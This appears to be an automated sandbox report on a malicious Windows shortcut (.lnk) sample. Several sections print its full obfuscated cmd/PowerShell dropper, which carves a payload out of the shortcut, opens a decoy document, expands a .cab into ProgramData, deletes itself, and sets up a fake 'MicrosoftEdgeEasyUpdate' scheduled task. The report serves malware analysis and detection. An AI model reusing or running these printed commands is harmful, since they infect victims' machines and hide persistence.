Malware Analysis Report

2025-08-05 22:22

Sample ID 240611-ffxknavdpb
Target 00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37
SHA256 00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37
Tags
execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37

Threat Level: Likely malicious

The file 00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37 was found to be: Likely malicious.

Malicious Activity Summary

execution

Command and Scripting Interpreter: PowerShell

Deletes itself

Checks computer location settings

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: CmdExeWriteProcessMemorySpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-11 04:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-11 04:49

Reported

2024-06-11 04:52

Platform

win7-20240508-en

Max time kernel

118s

Max time network

126s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\cmd.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /q /c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~5,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~0,1%%a4qw7afej:~4,1%%a4qw7afej:~7,1%%a4qw7afej:~9,1%%a4qw7afej:~0,1%%a4qw7afej:~11,1%%a4qw7afej:~11,1% -%a4qw7afej:~8,1%%a4qw7afej:~12,1%%a4qw7afej:~10,1%%a4qw7afej:~3,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~7,1%%a4qw7afej:~1,1%%a4qw7afej:~6,1%%a4qw7afej:~11,1%%a4qw7afej:~0,1% %a4qw7afej:~9,1%%a4qw7afej:~12,1%%a4qw7afej:~3,1%%a4qw7afej:~3,1%%a4qw7afej:~0,1%%a4qw7afej:~10,1% "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-11 04:49

Reported

2024-06-11 04:52

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

151s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A

Deletes itself

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\expand.exe | N/A
File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\expand.exe | N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 740 wrote to memory of 2480 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\cmd.exe
PID 740 wrote to memory of 2480 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\cmd.exe
PID 740 wrote to memory of 2480 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\cmd.exe
PID 2480 wrote to memory of 3352 | N/A | C:\Windows\syswow64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2480 wrote to memory of 3352 | N/A | C:\Windows\syswow64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2480 wrote to memory of 3352 | N/A | C:\Windows\syswow64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3352 wrote to memory of 3756 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\expand.exe
PID 3352 wrote to memory of 3756 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\expand.exe
PID 3352 wrote to memory of 3756 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\expand.exe
PID 3352 wrote to memory of 3872 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3352 wrote to memory of 3872 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3352 wrote to memory of 3872 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 3872 wrote to memory of 5092 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe
PID 3872 wrote to memory of 5092 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe
PID 3872 wrote to memory of 5092 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /q /c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~5,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~0,1%%a4qw7afej:~4,1%%a4qw7afej:~7,1%%a4qw7afej:~9,1%%a4qw7afej:~0,1%%a4qw7afej:~11,1%%a4qw7afej:~11,1% -%a4qw7afej:~8,1%%a4qw7afej:~12,1%%a4qw7afej:~10,1%%a4qw7afej:~3,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~7,1%%a4qw7afej:~1,1%%a4qw7afej:~6,1%%a4qw7afej:~11,1%%a4qw7afej:~0,1% %a4qw7afej:~9,1%%a4qw7afej:~12,1%%a4qw7afej:~3,1%%a4qw7afej:~3,1%%a4qw7afej:~0,1%%a4qw7afej:~10,1% "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\expand.exe

"C:\Windows\system32\expand.exe" C:\ProgramData\MicrosoftEdge\gewcdqa.cab -f:* C:\ProgramData\MicrosoftEdge

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\MicrosoftEdge\parkonA.bat""

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 13 /tn "MicrosoftEdgeEasyUpdate" /tr "cmd /q /c \"start \"Microsoft Edge Updater\" /min \"C:\ProgramData\MicrosoftEdge\parkon.bat\" &exit\"" /f

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 48.110.63.41.in-addr.arpa | udp
US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | | udp

Files

memory/3352-0-0x0000000074BFE000-0x0000000074BFF000-memory.dmp

memory/3352-1-0x0000000004980000-0x00000000049B6000-memory.dmp

memory/3352-2-0x0000000005080000-0x00000000056A8000-memory.dmp

memory/3352-3-0x0000000074BF0000-0x00000000753A0000-memory.dmp

memory/3352-4-0x0000000074BF0000-0x00000000753A0000-memory.dmp

memory/3352-5-0x0000000004FB0000-0x0000000004FD2000-memory.dmp

memory/3352-6-0x00000000058A0000-0x0000000005906000-memory.dmp

memory/3352-7-0x0000000005910000-0x0000000005976000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r3ziythu.2hi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3352-17-0x0000000005B50000-0x0000000005EA4000-memory.dmp

memory/3352-18-0x0000000005F30000-0x0000000005F4E000-memory.dmp

memory/3352-19-0x0000000005F80000-0x0000000005FCC000-memory.dmp

memory/3352-20-0x0000000006F30000-0x0000000006FC6000-memory.dmp

memory/3352-21-0x0000000006480000-0x000000000649A000-memory.dmp

memory/3352-22-0x00000000064D0000-0x00000000064F2000-memory.dmp

memory/3352-23-0x00000000077D0000-0x0000000007D74000-memory.dmp

memory/3352-24-0x0000000008400000-0x0000000008A7A000-memory.dmp

\??\c:\programdata\microsoftedge\gewcdqa.cab

MD5 bce6d6994700a3e05b4a22e3381a4d36
SHA1 6d3b8fd8c18f1daad940d3589890054fe5ff21b1
SHA256 623bda38e2790240ae31383db173ded9d295aa484f653ed4f1329174bbaf6154
SHA512 3dff495bfdb146ab244faefd7ea5944836bddf03732a2402f82b7d09cc45292a43f3188527c9099e216b50279507bfdadd0689c2bf44237a1cbea9123016558e

C:\ProgramData\MicrosoftEdge\parkonA.bat

MD5 a938e5c37311dabc48dc1d14c520b02a
SHA1 db9111dbb2eef7fb3482fa014bcea90c9b3df1f5
SHA256 fc13917afce9cae08c5aadfa35cf7b210208527e4d0a7f02d24eac82dc96460f
SHA512 a9e8e5f93dac1e72985719e6bbd612e90459d71f4a7b0848198346d031c3777ad02f4d13a38ccb05a03a317290dc3538cb3da032e53482d1718ce083d648b09e

C:\ProgramData\MicrosoftEdge\parkon.pko

MD5 f772107c865925631a56fac02f0c9631
SHA1 cdc8ee71f01c59c3362548f751ec2803b745c6bd
SHA256 e173955f4c0d266c3a108a95eeca07c88df1810b763b1b254596e40e75177894
SHA512 4efc5babb74ed98f78b6a342290c1f7645fc49c247d4eece1c2cbe6fdb25df70ce9ca78ac0929121898e180385f575f92304c3a09a8db1fcb4af43e5a4238235

C:\ProgramData\MicrosoftEdge\parkonB.pko

MD5 0d550d3c3fcc95dc191a9cb56f8d7fea
SHA1 e557278ee060b09fa227a0b9ef144e021763ecd5
SHA256 16ccd83a5c3d0e686491e7f7f650a7199d6add01c25fe587bf81b1e43575f564
SHA512 219d9f06cab7289935d1fc3476d41218b7910cce9fa9c60eda129d430b7f6d30e58a9619cfd6f93da9b1fde3c7f7d07383ecd174fcf2c98618ac75bbb804ca60

memory/3352-51-0x0000000074BF0000-0x00000000753A0000-memory.dmp